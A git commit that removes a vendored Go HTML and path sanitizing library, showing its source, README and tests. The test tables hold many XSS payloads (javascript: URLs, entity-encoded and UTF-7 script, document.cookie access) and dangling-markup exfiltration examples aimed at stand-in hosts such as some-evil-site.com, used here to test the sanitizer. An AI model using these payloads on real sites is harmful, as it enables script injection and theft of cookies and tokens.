Remove sanitize package

This commit is contained in:
Remco 2017-03-28 17:15:26 +02:00
parent 2f35235865
commit 5ccf97b353
6 changed files with 0 additions and 728 deletions

View file

@ -1,22 +0,0 @@
# Compiled Object files, Static and Dynamic libs (Shared Objects)
*.o
*.a
*.so
# Folders
_obj
_test
# Architecture specific extensions/prefixes
*.[568vq]
[568vq].out
*.cgo1.go
*.cgo2.c
_cgo_defun.c
_cgo_gotypes.go
_cgo_export.*
_testmain.go
*.exe

View file

@ -1 +0,0 @@
language: go

View file

@ -1,27 +0,0 @@
Copyright (c) 2017 Mechanism Design. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the
distribution.
* Neither the name of Google Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

View file

@ -1,62 +0,0 @@
sanitize [![GoDoc](https://godoc.org/github.com/kennygrant/sanitize?status.svg)](https://godoc.org/github.com/kennygrant/sanitize) [![Go Report Card](https://goreportcard.com/badge/github.com/kennygrant/sanitize)](https://goreportcard.com/report/github.com/kennygrant/sanitize) [![CircleCI](https://circleci.com/gh/kennygrant/sanitize.svg?style=svg)](https://circleci.com/gh/kennygrant/sanitize)
========
Package sanitize provides functions to sanitize html and paths with go (golang).
FUNCTIONS
```go
sanitize.Accents(s string) string
```
Accents replaces a set of accented characters with ascii equivalents.
```go
sanitize.BaseName(s string) string
```
BaseName makes a string safe to use in a file name, producing a sanitized basename replacing . or / with -. Unlike Name no attempt is made to normalise text as a path.
```go
sanitize.HTML(s string) string
```
HTML strips html tags with a very simple parser, replace common entities, and escape < and > in the result. The result is intended to be used as plain text.
```go
sanitize.HTMLAllowing(s string, args...[]string) (string, error)
```
HTMLAllowing parses html and allow certain tags and attributes from the lists optionally specified by args - args[0] is a list of allowed tags, args[1] is a list of allowed attributes. If either is missing default sets are used.
```go
sanitize.Name(s string) string
```
Name makes a string safe to use in a file name by first finding the path basename, then replacing non-ascii characters.
```go
sanitize.Path(s string) string
```
Path makes a string safe to use as an url path.
Changes
-------
Version 1.2
Adjusted HTML function to avoid linter warning
Added more tests from https://githubengineering.com/githubs-post-csp-journey/
Chnaged name of license file
Added badges and change log to readme
Version 1.1
Fixed type in comments.
Merge pull request from Povilas Balzaravicius Pawka
- replace br tags with newline even when they contain a space
Version 1.0
First release

View file

@ -1,383 +0,0 @@
// Package sanitize provides functions for sanitizing text.
package sanitize
import (
"bytes"
"html"
"html/template"
"io"
"path"
"regexp"
"strings"
parser "golang.org/x/net/html"
)
var (
ignoreTags = []string{"title", "script", "style", "iframe", "frame", "frameset", "noframes", "noembed", "embed", "applet", "object", "base"}
defaultTags = []string{"h1", "h2", "h3", "h4", "h5", "h6", "div", "span", "hr", "p", "br", "b", "i", "strong", "em", "ol", "ul", "li", "a", "img", "pre", "code", "blockquote"}
defaultAttributes = []string{"id", "class", "src", "href", "title", "alt", "name", "rel"}
)
// HTMLAllowing sanitizes html, allowing some tags.
// Arrays of allowed tags and allowed attributes may optionally be passed as the second and third arguments.
func HTMLAllowing(s string, args ...[]string) (string, error) {
allowedTags := defaultTags
if len(args) > 0 {
allowedTags = args[0]
}
allowedAttributes := defaultAttributes
if len(args) > 1 {
allowedAttributes = args[1]
}
// Parse the html
tokenizer := parser.NewTokenizer(strings.NewReader(s))
buffer := bytes.NewBufferString("")
ignore := ""
for {
tokenType := tokenizer.Next()
token := tokenizer.Token()
switch tokenType {
case parser.ErrorToken:
err := tokenizer.Err()
if err == io.EOF {
return buffer.String(), nil
}
return "", err
case parser.StartTagToken:
if len(ignore) == 0 && includes(allowedTags, token.Data) {
token.Attr = cleanAttributes(token.Attr, allowedAttributes)
buffer.WriteString(token.String())
} else if includes(ignoreTags, token.Data) {
ignore = token.Data
}
case parser.SelfClosingTagToken:
if len(ignore) == 0 && includes(allowedTags, token.Data) {
token.Attr = cleanAttributes(token.Attr, allowedAttributes)
buffer.WriteString(token.String())
} else if token.Data == ignore {
ignore = ""
}
case parser.EndTagToken:
if len(ignore) == 0 && includes(allowedTags, token.Data) {
token.Attr = []parser.Attribute{}
buffer.WriteString(token.String())
} else if token.Data == ignore {
ignore = ""
}
case parser.TextToken:
// We allow text content through, unless ignoring this entire tag and its contents (including other tags)
if ignore == "" {
buffer.WriteString(token.String())
}
case parser.CommentToken:
// We ignore comments by default
case parser.DoctypeToken:
// We ignore doctypes by default - html5 does not require them and this is intended for sanitizing snippets of text
default:
// We ignore unknown token types by default
}
}
}
// HTML strips html tags, replace common entities, and escapes <>&;'" in the result.
// Note the returned text may contain entities as it is escaped by HTMLEscapeString, and most entities are not translated.
func HTML(s string) (output string) {
// Shortcut strings with no tags in them
if !strings.ContainsAny(s, "<>") {
output = s
} else {
// First remove line breaks etc as these have no meaning outside html tags (except pre)
// this means pre sections will lose formatting... but will result in less unintentional paras.
s = strings.Replace(s, "\n", "", -1)
// Then replace line breaks with newlines, to preserve that formatting
s = strings.Replace(s, "</p>", "\n", -1)
s = strings.Replace(s, "<br>", "\n", -1)
s = strings.Replace(s, "</br>", "\n", -1)
s = strings.Replace(s, "<br/>", "\n", -1)
s = strings.Replace(s, "<br />", "\n", -1)
// Walk through the string removing all tags
b := bytes.NewBufferString("")
inTag := false
for _, r := range s {
switch r {
case '<':
inTag = true
case '>':
inTag = false
default:
if !inTag {
b.WriteRune(r)
}
}
}
output = b.String()
}
// Remove a few common harmless entities, to arrive at something more like plain text
output = strings.Replace(output, "&#8216;", "'", -1)
output = strings.Replace(output, "&#8217;", "'", -1)
output = strings.Replace(output, "&#8220;", "\"", -1)
output = strings.Replace(output, "&#8221;", "\"", -1)
output = strings.Replace(output, "&nbsp;", " ", -1)
output = strings.Replace(output, "&quot;", "\"", -1)
output = strings.Replace(output, "&apos;", "'", -1)
// Translate some entities into their plain text equivalent (for example accents, if encoded as entities)
output = html.UnescapeString(output)
// In case we have missed any tags above, escape the text - removes <, >, &, ' and ".
output = template.HTMLEscapeString(output)
// After processing, remove some harmless entities &, ' and " which are encoded by HTMLEscapeString
output = strings.Replace(output, "&#34;", "\"", -1)
output = strings.Replace(output, "&#39;", "'", -1)
output = strings.Replace(output, "&amp; ", "& ", -1) // NB space after
output = strings.Replace(output, "&amp;amp; ", "& ", -1) // NB space after
return output
}
// We are very restrictive as this is intended for ascii url slugs
var illegalPath = regexp.MustCompile(`[^[:alnum:]\~\-\./]`)
// Path makes a string safe to use as an url path.
func Path(s string) string {
// Start with lowercase string
filePath := strings.ToLower(s)
filePath = strings.Replace(filePath, "..", "", -1)
filePath = path.Clean(filePath)
// Remove illegal characters for paths, flattening accents and replacing some common separators with -
filePath = cleanString(filePath, illegalPath)
// NB this may be of length 0, caller must check
return filePath
}
// Remove all other unrecognised characters apart from
var illegalName = regexp.MustCompile(`[^[:alnum:]-.]`)
// Name makes a string safe to use in a file name by first finding the path basename, then replacing non-ascii characters.
func Name(s string) string {
// Start with lowercase string
fileName := strings.ToLower(s)
fileName = path.Clean(path.Base(fileName))
// Remove illegal characters for names, replacing some common separators with -
fileName = cleanString(fileName, illegalName)
// NB this may be of length 0, caller must check
return fileName
}
// Replace these separators with -
var baseNameSeparators = regexp.MustCompile(`[./]`)
// BaseName makes a string safe to use in a file name, producing a sanitized basename replacing . or / with -.
// No attempt is made to normalise a path or normalise case.
func BaseName(s string) string {
// Replace certain joining characters with a dash
baseName := baseNameSeparators.ReplaceAllString(s, "-")
// Remove illegal characters for names, replacing some common separators with -
baseName = cleanString(baseName, illegalName)
// NB this may be of length 0, caller must check
return baseName
}
// A very limited list of transliterations to catch common european names translated to urls.
// This set could be expanded with at least caps and many more characters.
var transliterations = map[rune]string{
'À': "A",
'Á': "A",
'Â': "A",
'Ã': "A",
'Ä': "A",
'Å': "AA",
'Æ': "AE",
'Ç': "C",
'È': "E",
'É': "E",
'Ê': "E",
'Ë': "E",
'Ì': "I",
'Í': "I",
'Î': "I",
'Ï': "I",
'Ð': "D",
'Ł': "L",
'Ñ': "N",
'Ò': "O",
'Ó': "O",
'Ô': "O",
'Õ': "O",
'Ö': "O",
'Ø': "OE",
'Ù': "U",
'Ú': "U",
'Ü': "U",
'Û': "U",
'Ý': "Y",
'Þ': "Th",
'ß': "ss",
'à': "a",
'á': "a",
'â': "a",
'ã': "a",
'ä': "a",
'å': "aa",
'æ': "ae",
'ç': "c",
'è': "e",
'é': "e",
'ê': "e",
'ë': "e",
'ì': "i",
'í': "i",
'î': "i",
'ï': "i",
'ð': "d",
'ł': "l",
'ñ': "n",
'ń': "n",
'ò': "o",
'ó': "o",
'ô': "o",
'õ': "o",
'ō': "o",
'ö': "o",
'ø': "oe",
'ś': "s",
'ù': "u",
'ú': "u",
'û': "u",
'ū': "u",
'ü': "u",
'ý': "y",
'þ': "th",
'ÿ': "y",
'ż': "z",
'Œ': "OE",
'œ': "oe",
}
// Accents replaces a set of accented characters with ascii equivalents.
func Accents(s string) string {
// Replace some common accent characters
b := bytes.NewBufferString("")
for _, c := range s {
// Check transliterations first
if val, ok := transliterations[c]; ok {
b.WriteString(val)
} else {
b.WriteRune(c)
}
}
return b.String()
}
var (
// If the attribute contains data: or javascript: anywhere, ignore it
// we don't allow this in attributes as it is so frequently used for xss
// NB we allow spaces in the value, and lowercase.
illegalAttr = regexp.MustCompile(`(d\s*a\s*t\s*a|j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*)\s*:`)
// We are far more restrictive with href attributes.
legalHrefAttr = regexp.MustCompile(`\A[/#][^/\\]?|mailto://|http://|https://`)
)
// cleanAttributes returns an array of attributes after removing malicious ones.
func cleanAttributes(a []parser.Attribute, allowed []string) []parser.Attribute {
if len(a) == 0 {
return a
}
var cleaned []parser.Attribute
for _, attr := range a {
if includes(allowed, attr.Key) {
val := strings.ToLower(attr.Val)
// Check for illegal attribute values
if illegalAttr.FindString(val) != "" {
attr.Val = ""
}
// Check for legal href values - / mailto:// http:// or https://
if attr.Key == "href" {
if legalHrefAttr.FindString(val) == "" {
attr.Val = ""
}
}
// If we still have an attribute, append it to the array
if attr.Val != "" {
cleaned = append(cleaned, attr)
}
}
}
return cleaned
}
// A list of characters we consider separators in normal strings and replace with our canonical separator - rather than removing.
var (
separators = regexp.MustCompile(`[ &_=+:]`)
dashes = regexp.MustCompile(`[\-]+`)
)
// cleanString replaces separators with - and removes characters listed in the regexp provided from string.
// Accents, spaces, and all characters not in A-Za-z0-9 are replaced.
func cleanString(s string, r *regexp.Regexp) string {
// Remove any trailing space to avoid ending on -
s = strings.Trim(s, " ")
// Flatten accents first so that if we remove non-ascii we still get a legible name
s = Accents(s)
// Replace certain joining characters with a dash
s = separators.ReplaceAllString(s, "-")
// Remove all other unrecognised characters - NB we do allow any printable characters
s = r.ReplaceAllString(s, "")
// Remove any multiple dashes caused by replacements above
s = dashes.ReplaceAllString(s, "-")
return s
}
// includes checks for inclusion of a string in a []string.
func includes(a []string, s string) bool {
for _, as := range a {
if as == s {
return true
}
}
return false
}

View file

@ -1,233 +0,0 @@
// Utility functions for working with text
package sanitize
import (
"testing"
)
var Format = "\ninput: %q\nexpected: %q\noutput: %q"
type Test struct {
input string
expected string
}
// NB the treatment of accents - they are removed and replaced with ascii transliterations
var urls = []Test{
{"ReAd ME.md", `read-me.md`},
{"E88E08A7-279C-4CC1-8B90-86DE0D7044_3C.html", `e88e08a7-279c-4cc1-8b90-86de0d7044-3c.html`},
{"/user/test/I am a long url's_-?ASDF@£$%£%^testé.html", `/user/test/i-am-a-long-urls-asdfteste.html`},
{"/../../4-icon.jpg", `/4-icon.jpg`},
{"/Images_dir/../4-icon.jpg", `/images-dir/4-icon.jpg`},
{"../4 icon.*", `/4-icon.`},
{"Spac ey/Nôm/test før url", `spac-ey/nom/test-foer-url`},
{"../*", `/`},
}
func TestPath(t *testing.T) {
for _, test := range urls {
output := Path(test.input)
if output != test.expected {
t.Fatalf(Format, test.input, test.expected, output)
}
}
}
func BenchmarkPath(b *testing.B) {
for i := 0; i < b.N; i++ {
for _, test := range urls {
output := Path(test.input)
if output != test.expected {
b.Fatalf(Format, test.input, test.expected, output)
}
}
}
}
var fileNames = []Test{
{"ReAd ME.md", `read-me.md`},
{"/var/etc/jobs/go/go/src/pkg/foo/bar.go", `bar.go`},
{"I am a long url's_-?ASDF@£$%£%^é.html", `i-am-a-long-urls-asdfe.html`},
{"/../../4-icon.jpg", `4-icon.jpg`},
{"/Images/../4-icon.jpg", `4-icon.jpg`},
{"../4 icon.jpg", `4-icon.jpg`},
{"../4 icon-testé *8%^\"'\".jpg ", `4-icon-teste-8.jpg`},
}
func TestName(t *testing.T) {
for _, test := range fileNames {
output := Name(test.input)
if output != test.expected {
t.Fatalf(Format, test.input, test.expected, output)
}
}
}
func BenchmarkName(b *testing.B) {
for i := 0; i < b.N; i++ {
for _, test := range fileNames {
output := Name(test.input)
if output != test.expected {
b.Fatalf(Format, test.input, test.expected, output)
}
}
}
}
var baseFileNames = []Test{
{"The power & the Glory jpg file. The end", `The-power-the-Glory-jpg-file-The-end`},
{"/../../4-iCoN.jpg", `-4-iCoN-jpg`},
{"And/Or", `And-Or`},
{"Sonic.EXE", `Sonic-EXE`},
{"012: #Fetch for Defaults", `012-Fetch-for-Defaults`},
}
func TestBaseName(t *testing.T) {
for _, test := range baseFileNames {
output := BaseName(test.input)
if output != test.expected {
t.Fatalf(Format, test.input, test.expected, output)
}
}
}
// Test with some malformed or malicious html
// NB because we remove all tokens after a < until the next >
// and do not attempt to parse, we should be safe from invalid html,
// but will sometimes completely empty the string if we have invalid input
// Note we sometimes use " in order to keep things on one line and use the ` character
var htmlTests = []Test{
{`&nbsp;`, " "},
{`&amp;#x000D;`, `&amp;#x000D;`},
{`<invalid attr="invalid"<,<p><p><p><p><p>`, ``},
{"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "Bold Not bold\nAlso not bold."},
{`FOO&#x000D;ZOO`, "FOO\rZOO"},
{`<script><!--<script </s`, ``},
{`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `test`},
{`<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>`, ` or ***************aaaaaaaaaaaaaaaaaaaaaaaaaa`},
{`<p>Some text</p><frameset src="testing.html"></frameset>`, "Some text\n"},
{`Something<br/>Some more`, "Something\nSome more"},
{`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.<//data>><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">">><><img src="">`, "This is a 'test' of bold & italic \n invalid markup.. \""},
{`<![CDATA[<sender>John Smith</sender>]]>`, `John Smith]]`},
{`<!-- <script src='blah.js' data-rel='fsd'> --> This is text`, ` -- This is text`},
{`<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>`, `body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}`},
{`&lt;iframe src="" attr=""&gt;>>>>>`, `&lt;iframe src="" attr=""&gt;`},
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `alert("XSS")"`},
{`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``},
{`<IMG SRC=JaVaScRiPt:alert('XSS')&gt;`, ``},
{`<IMG SRC="javascript:alert('XSS')" <test`, ``},
{`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, ``},
{`&gt & test &lt`, `&gt; & test &lt;`},
{`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, ``},
{`&#8220;hello&#8221; it&#8217;s for &#8216;real&#8217;`, `"hello" it's for 'real'`},
{`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`, ``},
{`'';!--"<XSS>=&{()}`, `'';!--"=&amp;{()}`},
{"LINE 1<br />\nLINE 2", "LINE 1\nLINE 2"},
// Examples from https://githubengineering.com/githubs-post-csp-journey/
{`<img src='https://example.com/log_csrf?html=`, ``},
{`<img src='https://example.com/log_csrf?html=
<form action="https://example.com/account/public_keys/19023812091023">
...
<input type="hidden" name="csrf_token" value="some_csrf_token_value">
</form>`, `...`},
{`<img src='https://example.com?d=https%3A%2F%2Fsome-evil-site.com%2Fimages%2Favatar.jpg%2f
<p>secret</p>`, `secret
`},
{`<form action="https://some-evil-site.com"><button>Click</button><textarea name='
<!-- </textarea> --><!-- '" -->
<form action="/logout">
<input name="authenticity_token" type="hidden" value="secret1">
</form>`, `Click -- `},
}
func TestHTML(t *testing.T) {
for _, test := range htmlTests {
output := HTML(test.input)
if output != test.expected {
t.Fatalf(Format, test.input, test.expected, output)
}
}
}
var htmlTestsAllowing = []Test{
{`<IMG SRC="jav&#x0D;ascript:alert('XSS');">`, `<img>`},
{`<i>hello world</i href="javascript:alert('hello world')">`, `<i>hello world</i>`},
{`hello<br ><br / ><hr /><hr >rulers`, `hello<br><br><hr/><hr>rulers`},
{`<span class="testing" id="testid" name="testname" style="font-color:red;text-size:gigantic;"><p>Span</p></span>`, `<span class="testing" id="testid" name="testname"><p>Span</p></span>`},
{`<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`, `<div class="divclass">Div</div><h4><h3>test</h4>invalid</h3><p>test</p>`},
{`<p>Some text</p><exotic><iframe>test</iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`},
{`<b>hello world</b>`, `<b>hello world</b>`},
{`text<p>inside<p onclick='alert()'/>too`, `text<p>inside<p/>too`},
{`&amp;#x000D;`, `&amp;#x000D;`},
{`<invalid attr="invalid"<,<p><p><p><p><p>`, `<p><p><p><p>`},
{"<b><p>Bold </b> Not bold</p>\nAlso not bold.", "<b><p>Bold </b> Not bold</p>\nAlso not bold."},
{"`FOO&#x000D;ZOO", "`FOO&#13;ZOO"},
{`<script><!--<script </s`, ``},
{`<a href="/" alt="Fab.com | Aqua Paper Map 22"" title="Fab.com | Aqua Paper Map 22" - fab.com">test</a>`, `<a href="/" alt="Fab.com | Aqua Paper Map 22" title="Fab.com | Aqua Paper Map 22">test</a>`},
{"<p</p>?> or <p id=0</p> or <<</>><ASDF><@$!@£M<<>>>>>>>>>>>>>><>***************aaaaaaaaaaaaaaaaaaaaaaaaaa>", "?&gt; or <p id=\"0&lt;/p\"> or &lt;&lt;&gt;&lt;@$!@£M&lt;&lt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;&gt;***************aaaaaaaaaaaaaaaaaaaaaaaaaa&gt;"},
{`<p>Some text</p><exotic><iframe><frameset src="testing.html"></frameset>`, `<p>Some text</p>`},
{"Something<br/>Some more", `Something<br/>Some more`},
{`<a href="http://www.example.com"?>This is a 'test' of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.</data><alert><script CDATA[:Asdfjk2354115nkjafdgs]>. <div src=">escape;inside script tag"><img src="">`, `<a href="http://www.example.com">This is a &#39;test&#39; of <b>bold</b> &amp; <i>italic</i></a> <br/> invalid markup.`},
{"<sender ignore=me>John Smith</sender>", `John Smith`},
{"<!-- <script src='blah.js' data-rel='fsd'> --> This is text", ` This is text`},
{"<style>body{background-image:url(http://www.google.com/intl/en/images/logo.gif);}</style>", ``},
{`&lt;iframe src="" attr=""&gt;`, `&lt;iframe src=&#34;&#34; attr=&#34;&#34;&gt;`},
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>&#34;&gt;`},
{`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img>`},
{`<IMG SRC=JaVaScRiPt:alert('XSS')&gt;`, ``},
{`<IMG SRC="javascript:alert('XSS')">>> <test`, `<img>&gt;&gt; `},
{`&gt & test &lt`, `&gt; &amp; test &lt;`},
{`<img></IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`, `<img></img>`},
{`<img src="data:text/javascript;alert('alert');">`, `<img>`},
{`<iframe src=http://... <`, ``},
{`<iframe src="data:CSS"><img><a><</a>;sdf<iframe>`, ``},
{`<img src=javascript:alert(document.cookie)>`, `<img>`},
{`<?php echo('hello world')>`, ``},
{`Hello <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>World`, `Hello <a class="XSS"></a>World`},
{`<a href="javascript:alert('XSS1')" onmouseover="alert('XSS2')">XSS<a>`, `<a>XSS<a>`},
{`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`,
`<a href="http://www.google.com/"><img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png"/></a>`},
{`<a href="javascript:alert(&#39;XSS1&#39;)" "document.write('<HTML> Tags and markup');">XSS<a>`, `<a> Tags and markup&#39;);&#34;&gt;XSS<a>`},
{`<a <script>document.write("UNTRUSTED INPUT: " + document.location.hash);<script/> >`, `<a>document.write(&#34;UNTRUSTED INPUT: &#34; + document.location.hash); &gt;`},
{`<a href="#anchor">foo</a>`, `<a href="#anchor">foo</a>`},
{`<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>`, `<img>`},
{`<IMG SRC="jav ascript:alert('XSS');">`, `<img>`},
{`<IMG SRC="jav&#x09;ascript:alert('XSS');">`, `<img>`},
{`<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`, ` +ADw-SCRIPT+AD4-alert(&#39;XSS&#39;);+ADw-/SCRIPT+AD4-`},
{`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`, `PT SRC=&#34;http://ha.ckers.org/xss.js&#34;&gt;`},
{`<a href="javascript:alert('XSS')" src="javascript:alert('XSS')" onclick="javascript:alert('XSS')"></a>`, `<a></a>`},
{`'';!--"<XSS>=&{()}`, `&#39;&#39;;!--&#34;=&amp;{()}`},
{`<IMG SRC=javascript:alert('XSS')`, ``},
{`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`, `<img>&#34;&gt;`},
{`<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>`, `<img>`},
}
func TestHTMLAllowed(t *testing.T) {
for _, test := range htmlTestsAllowing {
output, err := HTMLAllowing(test.input)
if err != nil {
t.Fatalf(Format, test.input, test.expected, output, err)
}
if output != test.expected {
t.Fatalf(Format, test.input, test.expected, output)
}
}
}
func BenchmarkHTMLAllowed(b *testing.B) {
for i := 0; i < b.N; i++ {
for _, test := range htmlTestsAllowing {
output, err := HTMLAllowing(test.input)
if err != nil {
b.Fatalf(Format, test.input, test.expected, output, err)
}
if output != test.expected {
b.Fatalf(Format, test.input, test.expected, output)
}
}
}
}